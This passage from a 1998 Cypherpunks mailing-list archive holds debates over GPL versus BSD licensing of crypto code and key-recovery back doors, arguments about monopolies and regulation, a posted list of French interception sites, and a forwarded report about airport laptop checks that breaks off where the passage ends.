    anything using code covered by the license from being proprietary, and
    that's right.

    The proposed Cypherpunks license discourages the distribution of software
    with key recovery (= government back doors) by prohibiting anything using
    code covered by the license from having key recovery, and that's wrong.

Yes, exactly.  To uphold freedom for all users is right; to impose
your specific preferences on users who want to do something else is
wrong, because it takes away their freedom.

I don't like back doors, but I support users' freedom to install back
doors, for the same reason I support your freedom of speech even when
you say things I don't like.  The crucial thing is that each user
should be free to choose for perself; we must avoid giving a person,
company or government the power to choose for others.

The GNU GPL insists that everyone have the freedom to (1) see what is
inside the software they use, and (2) change it if they don't like it.

When everyone has this freedom, they can reject back doors, if they
want to.  If an otherwise-useful program has a back door, people can
tell.  (Most users would not have the training to recognize one, but
someone will spot it, and will warn the public.)  They can also remove
the back door "feature", and distribute a modified version which has
the same useful features but no back door.

If instead you make a requirement of "no government back doors", but
you permit proprietary versions whose source code is secret, what will
be the result?  If the person who makes a proprietary version obeys
your terms, it will have no government back door, but it might contain
something else bad, and no one could tell, including you.

What if someone makes a proprietary version and adds a back door?
That would violate your terms, but would you know?  Let's suppose you
do know that your code was used, either because person says so or
because you figure it out.  That does not enable you to tell that the
back door was added.  Thus, as a practical matter, you cannot enforce
this requirement the way you can enforce the GNU GPL.  (Once you know
your code was used, a violation of the GPL is blatantly obvious.)

Looking at the issue in a broader context, companies have the
resources to avoid using your code.  No matter how useful your package
may be, they can write other code to do the same job.

If you convince the users that government back doors are a bad thing,
but they think that proprietary (non-free) programs are ok, they will
always have to take it on trust that a given proprietary software
product has no back doors.  To be sure, if the product includes your
code, any back door would violate your terms (if only you knew about
it); but users will see no reason to insist on a product that uses
your code.  They may just as well choose a product that uses some
other implementation of the same feature, and that alternative
implementation may not have any prohibition on adding a back door.

If instead we convince the users that non-free software is a bad
thing, or even only that non-free crypto software is a bad thing, that
does the job much more thoroughly.  They may still choose a product
that uses some other implementation instead of your code, but if that
product is free software, they will be able to check its source for
back doors just the same.

The best way for the users to avoid *any* particular hidden misfeature
in software is to insist on using only free software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Sun, 4 Oct 1998 16:24:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <199810042124.PAA06245@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



A couple of people responded to this

    It isn't surprising that people who want to write non-free software
    are disappointed that the GNU project won't help them.  What is
    amazing is that they feel this is unfair.

by expressing doubt that anyone really thinks so.
I think the person who wrote this text

    I used to be quite pro-GNU until I tried this exercise (writing
    commercial crypto software for software companies) and ended up
    re-writing huge tracts of stuff just to remove the GNU license virus.

made that feeling quite clear through his use of name-calling.  He did
not content himself with saying, "I had to rewrite huge tracts of
stuff because its authors did not give permission to use it in a
proprietary program," because that straightforward and accurate
description would have shown why his resentment was unjustified.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Sun, 4 Oct 1998 16:24:33 +0800
To: ben@algroup.co.uk
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <199810042124.PAA06247@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



    d) As far as I can work out, someone who wants to free part of a
    product, but not all of it, can't practically do so under GPL.

I'm not really sure what that means, but I have a feeling that there
is a misunderstanding at the root of it.  Could you describe the scenario
more clearly, so I could tell for certain?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:23:13 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042024.PAA32554@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 12:42:58 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> Microsoft is not a monopoly.  In servers, where much of their
> income comes from,

Malarky, MS makes the vast majority of their money off end-user and single
machine licenses. Look at their quarterly or yearly earning statements.

> Linux is eating their lunch,

It is certainly growing but the fact is that by a factor of orders of
magnitude commercial Unix'es own that market. When it comes to mission
critical servers Solaris, HP, & AIX own the market still.

> and the
> desktop is under continual threat.  For a monopoly to be a
> monopoly, you not only have to have most of the market, you
> have to have some means of excluding others, which Microsoft
> manifestly does not.

Not from a lack of trying on their part and the fact that federal regulators
stepped in before it became totaly regulated.

> You are totally deluded.  None of these are examples of
> monopoly,

Certainly they were. Each and every example listed (and many more) were
industries which were controlled by a small number of companies whose share
in the total market was squeezing out competition. The results would have
been a growing number of buyouts and thinning of competition to the point
that only one or two companies would have survived.

 except for the railroad industry where government
> intervention was for the purpose of creating monopoly, not
> preventing it.

In the aircraft industry for example, while the number of riders was growing
very quickly there was a concommitent increase in end-user ticket prices
that was way out of line with the increased cost of business operations as
well as a decrease in the overall safety of the industry which was
exemplified by a increase in the number of air crashes and aircraft who
couldn't pass maintenance inspections yet continued to fly.
 
> The garment and food packing industries were and are a huge
> network of innumerable tiny shops,

All working for about 5 or 6 companies who actlualy marketed and distributed
the items. Just get a Dallas Texas phone book for that period (it's a
distribution hub for the clothing/garment industry even today).

> and the aircraft industry
> had several big companies in fierce competition.=20

Yep, in the mid-50's there were like 5 national/international aircraft
operators and the number of commercial avaition manufacturers selling to the
national and international carrier market was like 3. There were smaller
companies like Ryan for example but they were owned by the larger companies
and eventualy merged into the regular operations.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:24:36 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042028.PAA32626@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Sun, 4 Oct 1998 13:14:16 -0700 

> > Microsoft got to where it is because of a lack of regulation
> 
> Microsoft is not a monopoly by any stretch of the imagination.

They own 90% of the desktops in this country, that's a monopoly or a company
a hair-breadth's away.

> > The railroad industry in the mid-1800's.
> 
> Railroads were highly competitive in the East. The railroad monopolies
> in the West were created by exclusive government land grants.

Not true until after the 1890's. Prior to that the railroads in the US were
owned by a total of like 5 people.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:29:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042032.PAA32689@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 12:35:49 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> > Malarky. Reputation is irrelevant, just examine the
> > prisoners delima.
> 
> Yet strange to report, the banks have no problem with granting me many tens
> of thousands of dollars of unsecured credit.

Which is exactly my point, default on a single one of those and watch what
happens.

> Perhaps your reputation is irrelevant.  Mine, however, is obviously=
>  relevant.

Only to you. What is important is the *fact* that you continue paying the
bills. Default and all the *desire* in the world won't bring back those
loans.

> The continued solvency of Informix, rental car agencies, and so on and so
> forth looks indicates it is possible to readily distinguish between those
> who will defect in a game of prisoners dilemma, and those who will=
>  cooperate.

That's so funny. Please produce the amount Informix lost by employee theft
last year for example. If it's zero then you may have a point. I'll bet you
it wasn't and isn't.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:48:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042051.PAA32751@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 12:11:04 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> At 05:28 AM 10/2/98 -0500, Brown, R Ken wrote:
> > Nonsense. Most of those businesses became monopolies - or
> > local monopolies - in the relatively unregulated 1880-1914
> > period.=20
> 
> Untrue:

Actualy it is. But I'd certaily entertain any evidence you may want to
present to your case...other than just saying it over and over.

> > In some of them - like rail or oil in the USA - governments
> > introduced regulation to *force* competition.=20
> 
> In the case of the railways, the governments granted and
> imposed monopolies.

Only after the early 1890's when the situation got so bad they had to do
something. Prior to that there was no federal intervention in railroad
operations per se (I say that because the US government used the railroads
at a very hefty discount).

>  In the case of oil, I assume you are
> referring to "Standard Oil", there was no monopoly, and the
> government regulation had little apparent effect.=20

You assume wrong. I am talking of the entire oil industry as a whole.

> Also the Standard Oil issue was about refineries, not oil
> wells or oil pipelines.  There was nothing to prevent any man
> or his dog from setting up a refinery, and lots of them did.

The issue in the oil industry isn't the refineries or pipelines or any of
that other stuff. It's mineral rights. And every drop of mineral rights in
this country is owned by oil companies or the US government as a result of
the conflicts that took place from the late 1800's to the early 1900's.

> > Recently government has forcibly broken up gas supply
> > monopolies in this country. =20
> 
> After first forcibly creating gas supply monopolies.

Actualy the local and state regulators did that back in the late 50's and
early 60's the federals had no hand in it. The same happend prior to the TVA
projects of the late 20's and 30's with the electric production industry.

> > What happens much more often is that one company becomes
> > dominant and then uses money to undersell rivals.
> 
> Why don't you argue that they conduct sacrifices to Satan?

Because then he would be doing what you like to do, change the subject and
claim it's the same thing.

> A big company has no monetary advantage over a small company.

You know nothing of how large businesses work over small ones then.

> Suppose Firm A controls 90% of the market and firm B controls
> 10% of the market.  Artificially low prices cost the big firm
> nine times as much as the small firm.

Bullshit math. The interactions are nowhere near as simple as you state.
The big company has the resources to outlast the smaller company in any
industry that can monopolize (an issue you seem to miss, not all industries
can monopolize) and if its' smart will buy the smaller company at some
point (unless prevented) as the smaller companies becomes resource starved.

>  Under capitalism, the
> small company can duke it out on equal terms with the big
> firm, and with great regularity, that is exactly what they
> do.

Examples please where a small firm dukes it out (sic) on equal terms with a
larger one...

 > Garbage (what we call rubbish over here) collection  is
> > different again. It's not at all a nutural monopoly and
> > there is nothing stopping anyone offering to do it as a
> > business. But it is a natural for social ownership,
> 
> You mistake the political adventures of your local elite for
> universal laws.  In some parts of the world rubbish
> collection is private. 

In just about everyplace in the US the company doing the trash collection
and dumping is private, especialy in the bigger cities. They may be working
under contract for the city but the company is privately held. My suspicion
is that most places on the planet, excluding control markets like Cuba, use
private companies under contract for this.

> In other parts of the world shoe
> production is public.

What country produces shoes as a function of government agency and prevents
private shoe production?

I must admit I nearly hurt myself laughing at this one.

> In one of those nordic countries, I think Finland, the phone
> system was never made a public enterprise or state regulated
> monopoly, but most other things were.

Then how does it operate? Who owns the switches and wires? Either it's a
public utility or it's some sort of private enterprise (though it may be
under contract to the government).

> There is no "natural monopoly" that is not somewhere a

A 'natural' monoploy, to my mind, is a company that operates in an industry
that can be saturated. By saturation I mean that the demand of the market
can be met by a small number (approaching 1 if left unregulated over time,
usualy by by-outs or business experation) of manufacturers.

The VCR industry is a great example of a 'natural' monopoly. Only a few years
ago *every* VCR mechanism on the planet was made by one of 5 companies and
with the cessation of Curtis-Williams, not one of them was a US company. It
is not possible to buy a VCR designed and made in the US today because of
this market monopolization. It is also impossible to start such a company
because the costs of market entry are too enormous. There is *no* government
regulation of the VCR industry outside of EOE issues to this day.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:57:07 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810042101.QAA00049@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 11:40:34 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: I thought of an initialy regulated industry!...

> Observe that the level of harm is approximately proportional
> to the level of government regulation.

Please be so kind as to demonstrate by example why you believe that by
de-regulating the food industry, for example, we would recieve better
quality foodstuffs? Without regulation why would these companies quit mixing
their products and making better systems of quality control so that the
cases of E. Coli for example would decrease? Why is it that the number of
deaths in this country from salmonella and related food diseases have
*decreased* since the industry was regulated in the early 1920's when the
problem (people getting sick or dying from adulterated foodstuffs) was
at its peak?

Just look at the current issues related to non-pasteurized fruit juice
prodcts for a current example of the consequences of free-market economics
lack of regulation and by extension responsibility and the consequences
thereof.

> You presuppose that government officials will be more
> virtuous than private individuals.  This is obviously
> unlikely, since they have less reason to fear retribution
> than private individuals.

It's the private companies fearing retribution from the government, not the
end user. Your reasoning is faulty.

In an industry that is completely unregulated by anyone other than the
consumer and the producer the consumer will be taken advantage of. The
reason is that there is no real-world market force that will force
compliance. Now some are going to scream that the consumer will, the problem
is that the consumer is denied the information about/from the producer they
require in order to make the reasoned judgement.

The bottem line as to why free-market economies don't work is that it isn't
in the producers best interest to have a educated consumer. They might buy
somebody elses product or start their own company. Both of those are bad for
profits.

Free-market mavens forget that producers are just as greedy and corrupt as
everyone else, there is no fair competition in an unregulated market given
the pshychological make up of human beings.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 4 Oct 1998 17:13:33 +0800
To: cypherpunks@cyberpass.net
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928471D@mossbay.chaffeyhomes.com>
Message-ID: <v04011735b23d9b3fb030@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:37 PM -0400 on 10/4/98, James A. Donald wrote:

> To the best of my observation, every single small business is
> operating illegally.

Amen. Literally.

That is, when the church ruled our lives, it was impossible not to be
sinning for some reason.

These days, the state rules our lives, and we're all breaking the law.

Most criminologists will tell that the more corrupt the jurisdiction, the
harder it is to be in compliance with the law. That way, it's easier for
the state's functionaries to shake you down.

Ayn Rand has a great quote about this, which I have long forgotten, but my
favorite bit of impromptu wisdom on the subject is from Vinnie Moscaritolo,
who blurted out one night, on a long climb up Page Mill road, "'If we could
just pass a few more laws', we could all be criminals!"


Also, Voltaire was famous for saying, in French of course :-), 'death to la
infame' (le? I took latin instead, and was bad at it, anyway.). By la
infame, "the infamous thing", he meant the church, of course. While it
probably sounds a little haughtier than "smash the state", (or, as I am
wont say, *surfact* the state ;-)), Voltaire's saying, in the original,
might make a nice slogan to, um, resurrect, if someone wants to dust off
their college french and do the honors...

Odd thing for a man to say who was buried in the floor of a church anyway.
It'd be like putting Mr. Young in Arlington, or something. ;-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: interception <interception@ii-mel.com>
Date: Sun, 4 Oct 1998 12:32:40 +0800
To: cypherpunks@toad.com
Subject: http://jya.com/ECHELON-GO.htm
Message-ID: <1.5.4.32.19981004172611.006f0e5c@mail.ii-mel.com>
MIME-Version: 1.0
Content-Type: text/plain



From: interception <interception@ii-mel.com>
Subject: http://jya.com/ECHELON-GO.htm

french centers of electronic interceptions are in: 

1 - Agde
2 - Rohrbach-les-Bitch 
3 - Domme 
4 - Mtzig, 
5 - Alluets-Feucherolles
6 - Celar (Army) (fax, scramble,...): 950 people in Rennes
7 - Security Squad and electronic war (4 squads) in Metz
8 - Plateau d'Albion: 150 people
9 - Boat: Cargo le Bercy
10- Bouar (Centrafrican Rpublic)
11- Solenzara (Corse)
12- St-Barthlemy (Guadeloupe)
13- Runion
14- Mayotte, Djibouti
15- Kourou Spatial Base (Guyane)
16- United Arab Emirates
17- New Caledonia

In spite of Echelon http://www.ii-mel.com/interception/echelongb.htm
french electronic interception are practiced in the USA




Masson
http://www.ii-mel.com/interception




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <jdobruck@kki.net.pl>
Date: Sun, 4 Oct 1998 13:42:09 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Please include me
In-Reply-To: <80e9319b.3616faed@aol.com>
Message-ID: <3617CF97.5FB84B43@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain



Well, what a neat way to get on this list, just ask someone to do it
for you... well it's WRONG. Go to

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/Home.html

and get the information you need from there....
You're lucky, I was in a good mood today... you got help... but there
are people out there who just hate your guts...
So learn mr. aol user and stop asking this stupid question. There are
FAQ's to help such people as yourself.
Regards,
Jan Dobrucki

KCzzzzz@aol.com wrote:

> Include me on your mailing list
>
> --
> Wyslano za posrednictwem bezplatnego serwera KKI
> Krakowski Komercyjny Internet - http://www.kki.net.pl
>
> To jest miejsce na reklame Twojej firmy!


--
Wyslano za posrednictwem bezplatnego serwera KKI
Krakowski Komercyjny Internet - http://www.kki.net.pl

To jest miejsce na reklame Twojej firmy!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 4 Oct 1998 20:59:58 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199810050201.VAA01105@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 5 Oct 1998 01:04:20 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)

> If your aim is to maximise crypto deployment, use BSD or some other
> relatively free distribution license other than GNU, so that we can
> more rapidly write and deploy crypto software to undermine the power
> of the state.

With the proviso that the original author looses all access to profits from
that code, effectively doing the R&D for untold numbers of companies without
compensation or even recognition (they can claim it's all theirs at that
point because they don't have to release the source).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Alten <Alten@home.com>
Date: Sun, 4 Oct 1998 22:48:50 +0800
To: ben@algroup.co.uk
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <36134ACF.A09E1263@algroup.co.uk>
Message-ID: <3.0.3.32.19981004210155.00aadd60@mail>
MIME-Version: 1.0
Content-Type: text/plain



Richard and others,

Please stop.  This thread does not belong on the 
coderpunks mailing list.  If you want to argue
about BXA vs GPL please take it elsewhere.

- Alex

--

Alex Alten

Alten@Home.Com
Alten@TriStrata.Com

P.O. Box 11406
Pleasanton, CA  94588  USA
(925) 417-0159




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sun, 4 Oct 1998 23:04:24 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@einstein.ssz.com>
Subject: RE: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810042101.QAA00049@einstein.ssz.com>
Message-ID: <000501bdf016$5b28f700$7e8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim Choate:

: The bottem line as to why free-market economies don't work is that it isn't
: in the producers best interest to have a educated consumer.  They might buy
: somebody elses product or start their own company. Both of those are bad for
: profits.
:
: Free-market mavens forget that producers are just as greedy and corrupt as
: everyone else, there is no fair competition in an unregulated market given
: the pshychological make up of human beings.
........................................................................................


Free market economices don't "work", simply because they are run by humans, who regularly suffer
psychological breakdowns, envy, and mistakes of judgement, not to mention disreputable marketing
departments.   Regulated economies, however, are run by government drones, and are therefore perfect
vehicles which, with unfailing success, make all of their captive customers happy.

Everyone knows this, as we witness the apparent success of all those regulated economies overseas
which outshine the U.S. by three (maybe four) orders of magnitude.  No one over there envies the
U.S. productivity and standard of living, and they never are moved to leave and come live over here,
to give up the benefits which extreme regulation confers upon them, in place of the (admittedly
mixed) free-market fiasco which operates over here, where all things are uncertain and frighteningly
unpredictable.

In fact, many people become so disgusted with the monopolies and disfunctional liberty which exists
here, that they regularly expatriate to go live in places like Sweden, Germany, even Canada, where
they have the peace of mind and assurance that State coercion will provide for their every need  -
in a most efficient, timely, prompt, and user-friendly manner.

They never have to worry about who has more or less, who is better or worse, or who knows better
than anyone what is best for everyone.  It's all been pre-established and exists incontrovertibly in
their national consumer database.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 4 Oct 1998 16:18:40 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810042112.XAA11806@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
>> There is a desert which is 1000 miles across. There is a camel who can
carry
>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The camel
>> has a total of 3000 bananas to begin with. What is the maximum number of
>> bananas that the camel can get across to the other side uneaten?
>
>My camels don't understand/can't eat fractional bananas.

Why are bananas quantized in the presense of camels?  Is this
a quantum-computing thing?









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 4 Oct 1998 23:43:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810050447.XAA01383@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Blanc" <blancw@cnw.com>
> Subject: RE: I thought of an initialy regulated industry!... (fwd)
> Date: Sun, 4 Oct 1998 21:09:55 -0700

> Free market economices don't "work", simply because they are run by humans,
 who regularly suffer
> psychological breakdowns, envy, and mistakes of judgement, not to mention
 disreputable marketing
> departments.   Regulated economies, however, are run by government drones,
 and are therefore perfect
> vehicles which, with unfailing success, make all of their captive customers
 happy.
> 

Not so, but I appreciate the sense of irony in your comment.

> Everyone knows this, as we witness the apparent success of all those
 regulated economies overseas
> which outshine the U.S. by three (maybe four) orders of magnitude.  No one
 over there envies the
> U.S. productivity and standard of living, and they never are moved to leave
 and come live over here,
> to give up the benefits which extreme regulation confers upon them, in
 place of the (admittedly
> mixed) free-market fiasco which operates over here, where all things are
 uncertain and frighteningly
> unpredictable.

Simply because people see a better place does not imply it is the *best*
place.

Selecting the lesser of two evils does not magicaly make one a goodness.
It's still an evil.

> In fact, many people become so disgusted with the monopolies and
 disfunctional liberty which exists
> here, that they regularly expatriate to go live in places like Sweden,
 Germany, even Canada, where
> they have the peace of mind and assurance that State coercion will provide
 for their every need  -
> in a most efficient, timely, prompt, and user-friendly manner.
 
> They never have to worry about who has more or less, who is better or worse,
 or who knows better
> than anyone what is best for everyone.  It's all been pre-established and
 exists incontrovertibly in
> their national consumer database.

It would be nice if  you said something other than "I disagree". It would
really be nice if you cold describe specific examples and hypothesis, but
that obviously is asking too much.

Ah well.

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 4 Oct 1998 23:48:56 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Another question about free-markets...
Message-ID: <199810050453.XAA01444@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Milton Friedman won the Nobel price in 1976 in economics. One of the
questions he asked was:

Do corporate executives, provided they stay within the law, have
responsibilities in their business activities other than to make as much
money for their stockholders as possible?

His answer was 'no', they have no responsibility outside of those two
considerations (ie the law, stockholders expectations of profit).

Now in a free-market, by definition, there is no law. What then is the
responsibility of businesses other than the pure unadulterated pursuit of
profit? If this includes lying, denying consumers information, etc. what
harm is done, they have fulfilled their responsibility to their shareholders
(potentialy quite lucratively) and broken no law. Within this environment it
follows that a primary strategy for such executives is the elimination of
*all* competition. And since there is no law other than the measure of profit
all can be justified.

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 4 Oct 1998 19:16:20 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810042124.PAA06245@wijiji.santafe.edu>
Message-ID: <199810050004.BAA00788@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Richard Stallman writes:
> A couple of people responded to this
> 
>     It isn't surprising that people who want to write non-free software
>     are disappointed that the GNU project won't help them.  What is
>     amazing is that they feel this is unfair.
> 
> by expressing doubt that anyone really thinks so.

Well I don't think it's unfair, and it's my post you quoted as an
example!  Anyone who writes something is clearly free to put anything
they like in their licenses.  This was not the point being made.

As there seems to be some confusion, let me try to summarise why
several people have said they prefer BSD license (or indeed LGPL) to
GNU GPL _in the particular case of crypto code_:

Cypherpunks are interested to deploy crypto code with out backdoors
(`cypherpunks write code' and all that).  Consider for a moment that
this is your primary aim.

It is useful to build upon on other cypherpunks code.  (Having to code
everything from scratch is going to take you a long time..., let's see
we'll start with re-writing a bignum library from scratch).

You would like your code to be widely deployed, and some companies are
good at distributing code.  If you could get them to include crypto in
their applications that would be a lot of crypto out there.

So when someone writes crypto code form this perspective the BSD
license better achieves their aim.  This is not an insult to the FSF's
aims.  The BSD license (for example) is in some ways more free than
the GNU license: it allows free distribution, but is less strict in
propagating this to derived works.  This lesser strictness is useful
for crypto deployment because it allows commercial derivative works
(what you have termed proprietary) software.  Cypherpunks want to
encourage these also, though they would prefer that source be
available so that people can check for quality, correctness, and for
backdoors.


The comments on having to re-write GNU code which several people made
(in the context of crypto software) are not saying that it is "unfair
that GNU contributers don't do free work for the cypherpunk cause",
what it is saying is this:

If your aim is to maximise crypto deployment, use BSD or some other
relatively free distribution license other than GNU, so that we can
more rapidly write and deploy crypto software to undermine the power
of the state.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 5 Oct 1998 04:16:03 +0800
To: cypherpunks@cyberpass.net
Subject: US Secret Service checking laptops at airports
Message-ID: <v0401173cb23dbbb35156@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone else had this happen to them?

I'd love to have two independent corroborations of this, instead of hearing
it third-hand...

Cheers,
Bob Hettinga

--- begin forwarded text


From: "Sidney Markowitz" <sidney@communities.com>
To: <cryptography@c2.net>
Subject: US Secret Service checking laptops at airports
Date: Sat, 3 Oct 1998 18:26:52 -0700
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: owner-cryptography@c2.net

A friend of mine recently traveled from one of the Washington DC area
